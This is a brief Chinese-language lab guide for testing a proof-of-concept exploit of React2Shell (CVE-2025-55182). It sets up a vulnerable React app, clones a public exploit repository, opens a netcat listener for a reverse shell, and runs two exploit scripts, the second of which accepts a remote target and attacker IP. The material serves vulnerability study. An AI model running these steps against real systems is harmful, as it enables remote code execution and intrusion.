
POC 与实验室搭建
POC 与实验环境搭建
npm create [email protected] react2shell-lab
接受默认设置即可,名称随意
git clone https://github.com/timsonner/React2Shell-CVE-2025-55182.git
npm install
cd react2shell-lab
npm run dev
nc -nlvp 4444
python3 react2shell-exploit-1.py
此漏洞利用适合测试 localhost 配置。取消注释另一个 payload 即可获得反弹 shell...
python3 react2shell-exploit-2.py
此版本会要求用户输入远程目标以及攻击者 IP 和端口。本版本中的 POST 主体(body_parts)也略有精简。
https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained